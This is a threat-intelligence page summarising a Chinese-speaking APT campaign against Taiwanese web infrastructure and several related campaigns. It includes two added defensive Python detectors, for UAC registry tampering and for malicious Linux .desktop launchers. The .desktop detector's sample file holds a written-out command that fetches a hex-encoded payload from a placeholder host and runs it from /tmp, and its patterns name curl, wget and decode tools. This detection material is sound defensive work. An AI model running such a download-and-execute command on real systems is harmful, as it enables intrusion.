UAT-7237 Targets Taiwan Web Infrastructure with Customized Open-Source Tools


Summary


A Chinese-speaking APT group, UAT-7237, has been actively targeting web infrastructure entities in Taiwan since at least 2022. The group uses customized open-source tools to establish long-term access within high-value environments. UAT-7237 is believed to be a sub-group of UAT-5918, which has been targeting critical infrastructure in Taiwan since 2023. The attacks involve exploiting known security flaws in unpatched servers, followed by reconnaissance and the deployment of various tools, including SoundBill, Cobalt Strike, JuicyPotato, and Mimikatz. The group's tactics include using SoftEther VPN clients and RDP for persistent access, and making registry changes to disable User Account Control (UAC). The impact of these attacks includes potential long-term access to compromised systems, data exfiltration, and further exploitation within the affected networks.
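The UAC tampering mentioned above leaves a clear trace in endpoint telemetry. The following is an added example, not part of the original article or of any vendor's tooling: it flags Sysmon Event ID 13 (registry value set) records that write a zero to one of the UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. The event records are constructed, and the value list and the zero-only rule are assumptions.

```python
import re

UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# UAC policy values under that key; a DWORD of 0 weakens or disables UAC.
# Assumption: a zero write is the only state treated as suspicious here.
UAC_VALUES = {
    "EnableLUA": "UAC disabled entirely (effective after the next reboot)",
    "ConsentPromptBehaviorAdmin": "administrators elevate silently, no prompt",
    "PromptOnSecureDesktop": "elevation prompts leave the secure desktop",
}
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")

def uac_weakening(events):
    """Return (image, value_name, reason) for each event that sets a UAC value to 0."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:          # 13 = RegistryEvent (Value Set)
            continue
        key, _, name = ev["TargetObject"].rpartition("\\")
        if key.lower() != UAC_KEY.lower() or name not in UAC_VALUES:
            continue
        m = DWORD_RE.fullmatch(ev["Details"])
        if m and int(m.group(1), 16) == 0:
            hits.append((ev["Image"], name, UAC_VALUES[name]))
    return hits

# Constructed sample telemetry (not real data); field names mirror Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": UAC_KEY + r"\EnableLUA", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\Temp\update.exe",
     "TargetObject": UAC_KEY + r"\EnableLUA", "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\Temp\update.exe",
     "TargetObject": UAC_KEY + r"\ConsentPromptBehaviorAdmin", "Details": "DWORD (0x00000000)"},
    {"EventID": 12, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": UAC_KEY + r"\EnableLUA", "Details": ""},
]

if __name__ == "__main__":
    for image, name, reason in uac_weakening(SAMPLE_EVENTS):
        print(f"{image} set {name}=0: {reason}")
```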

Timeline

  1. 15.08.2025 19:20

    UAT-7237 Targets Taiwan Web Infrastructure with Customized Tools

    Since at least 2022, the Chinese-speaking APT group UAT-7237 has been targeting web infrastructure entities in Taiwan. The group uses customized open-source tools to evade detection and establish long-term access within high-value environments. The attacks involve exploiting known security flaws, deploying tools like SoundBill and Cobalt Strike, and using SoftEther VPN clients and RDP for persistent access.



Similar Happenings

TAG-150 Expands Operations with CastleRAT in Python and C

The threat actor TAG-150, known for CastleLoader malware, has developed a new remote access trojan named CastleRAT. CastleRAT is available in both Python and C variants, and it is used to collect system information, execute commands, and download additional payloads. CastleRAT's development began in March 2025, and it is part of a multi-tiered infrastructure used by TAG-150. The malware is distributed through phishing attacks, fraudulent GitHub repositories, and other methods. The Python variant, also known as PyNightshade, and the C variant have different capabilities. The C variant includes keylogging, screenshot capture, file upload/download, and cryptocurrency clipper functionality. CastleRAT uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. TAG-150 has been active since at least March 2025, using CastleLoader as an initial access vector for various secondary payloads, including remote access trojans, information stealers, and other loaders. TAG-150's operations have targeted critical infrastructure, including U.S. government agencies, and have been linked to a Play Ransomware attack against a French organization. The group's MaaS operation is likely promoted within closed circles, indicating a sophisticated and connected user base. TAG-150 is likely to develop and release additional malware in the near term and expand its distribution efforts.

Chinese State-Sponsored Actors Compromise Global Critical Infrastructure Networks

Chinese state-sponsored Advanced Persistent Threat (APT) actors, specifically the group known as Salt Typhoon, have been conducting a sustained campaign to gain long-term access to critical infrastructure networks worldwide. This campaign targets telecommunications, transportation, lodging, and military networks, exploiting vulnerabilities in routers and taking steps to evade detection and maintain persistent access. The Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and international partners, released a joint advisory detailing this ongoing malicious activity. The advisory provides actionable guidance and intelligence to help organizations defend against these sophisticated cyber threats. It builds on previous reporting and incorporates updated threat intelligence from investigations conducted through August 2025, reflecting overlapping indicators with industry reporting on various Chinese state-sponsored threat groups. Salt Typhoon has been active since at least 2019, targeting at least 600 organizations in 80 countries, including 200 in the U.S. The Czech Republic's National Cyber and Information Security Agency (NUKIB) issued a warning about data transfers to China, highlighting concerns over the transfer of system and user data to the PRC and the remote administration of technical assets. The Czech government previously accused China of targeting its critical infrastructure through APT31, activity which began in 2022. China's offensive cyber activities include large-scale telco attacks by Salt Typhoon and positioning for potential destructive cyberattacks. The advisory tracks this cluster of activity to multiple advanced persistent threats (APTs), though it partially overlaps with Salt Typhoon.

The advisory details how state-backed threat actors, including Salt Typhoon, penetrate networks around the world, as well as how defenders can protect their own environments. NUKIB has assessed the risk of significant disruptions caused by China at a 'High' level, indicating a high probability of occurrence. NUKIB confirmed malicious activities of Chinese cyber-actors targeting the Czech Republic, including a recent APT31 campaign targeting the Czech Ministry of Foreign Affairs. The Chinese government has access to data stored by private cloud service providers within the Czech Republic, ensuring that sensitive data is always within its reach. NUKIB warns that consumer devices such as smartphones, IP cameras, electric cars, large language models, and even medical devices and photovoltaic converters manufactured by Chinese firms are risky devices that can transfer potentially sensitive data to Chinese infrastructure. 45 previously unreported domains associated with Salt Typhoon and UNC4841 have been discovered, with the oldest domain registration activity dating back to May 2020.

APT36 Linux .desktop File Abuse for Malware Delivery in Ongoing Espionage Campaign

APT36, a Pakistani cyber espionage group, is actively exploiting Linux .desktop files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. These files execute a payload that establishes persistent access and exfiltrates data. The attack leverages the 'Exec=' field in .desktop files to run shell commands, fetching and executing a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, capable of maintaining stealth and setting up persistence through cron jobs and systemd services. Communication with the command and control (C2) server is conducted over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.
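The Exec= abuse described above can be checked for on disk. This is an added example, not code from the original report or from any vendor: it parses the [Desktop Entry] group of a .desktop file and flags Exec= values that wrap a shell, fetch from the network, hex-decode, or write to a temp path, plus launchers whose name or icon claims to be a PDF but which do not start a document viewer. The indicator list, the viewer names and the two sample files are constructed assumptions.

```python
import re
# (label, regex over the Exec= value); assumption: these plus the lookalike check suffice here.
EXEC_INDICATORS = [
    ("shell wrapper", re.compile(r"^(/bin/)?(ba|z|da)?sh\s+-c\b")),
    ("network fetch", re.compile(r"\b(curl|wget)\b")),
    ("hex decode", re.compile(r"\bxxd\s+-r\b|\bbase64\s+-d\b")),
    ("writes to temp", re.compile(r"/tmp/|/dev/shm/")),
]

def parse_desktop(text):
    """Return key=value pairs of the [Desktop Entry] group; comments and other groups skipped."""
    entry, in_group = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_group = (line == "[Desktop Entry]")
        elif in_group and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def assess(text):
    """Return the indicator labels that fire for one .desktop file's contents."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    hits = [label for label, rx in EXEC_INDICATORS if rx.search(exec_line)]
    # Lookalike: the name or icon claims PDF, but Exec= is not a document viewer.
    claims_pdf = entry.get("Name", "").lower().endswith(".pdf") or entry.get("Icon") == "application-pdf"
    if claims_pdf and exec_line and not exec_line.startswith(("xdg-open", "evince", "okular")):
        hits.append("pdf lookalike")
    return hits

# Constructed samples (not real files): a normal launcher and one shaped like the campaign's.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
"""

SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Icon=application-pdf
Exec=bash -c "curl -fsSL http://placeholder.invalid/p | xxd -r -p > /tmp/.cx && /tmp/.cx"
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, assess(text) or "clean")
```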

Murky Panda, Genesis Panda, and Glacial Panda Target Cloud and Telecom Sectors

Chinese cyber espionage groups Murky Panda, Genesis Panda, and Glacial Panda have escalated their activities targeting cloud and telecom sectors. Murky Panda exploits trusted cloud relationships and zero-day vulnerabilities to breach enterprise networks. They also compromise cloud service providers to gain access to downstream customer environments. Genesis Panda targets cloud services for lateral movement and persistence. Glacial Panda focuses on telecom organizations to exfiltrate call detail records and related telemetry. Murky Panda, also known as Silk Typhoon, has been active since at least 2021, targeting government, technology, academic, legal, and professional services entities in North America. They exploit internet-facing appliances, SOHO devices, and known vulnerabilities in Citrix and Commvault to gain initial access. They deploy web shells and custom malware like CloudedHope to maintain persistence. Genesis Panda, active since January 2024, targets financial services, media, telecommunications, and technology sectors across 11 countries. They exploit cloud-hosted systems for lateral movement and persistence, using compromised credentials to burrow deeper into cloud accounts. Glacial Panda has seen a 130% increase in activity targeting the telecom sector, focusing on Linux systems and legacy operating systems. They exploit known vulnerabilities and weak passwords to gain access and deploy trojanized OpenSSH components for credential harvesting.

N-able N-central Insecure Deserialization and Command Injection Vulnerabilities Exploited

Two vulnerabilities in N-able N-central, an RMM platform for MSPs, are being actively exploited. The flaws, CVE-2025-8875 and CVE-2025-8876, allow for command execution and command injection. N-able released patches in versions 2025.3.1 and 2024.6 HF2 on August 13, 2025. The U.S. CISA added these vulnerabilities to its KEV catalog, urging agencies to apply fixes by August 20, 2025. The vulnerabilities require authentication to exploit, and exploitation has been observed in a limited number of on-premises environments. N-able has not seen evidence of exploitation in its hosted cloud environments. The vulnerabilities affect Windows, Apple, and Linux endpoints managed by N-central. Over 800 N-able N-central servers remain unpatched, with approximately 2,000 instances exposed online. Shadowserver Foundation is tracking 880 vulnerable servers, mostly in the U.S., Canada, and the Netherlands. N-able has communicated the hotfix to all N-central customers and has committed to updating customers with additional information as their investigation continues.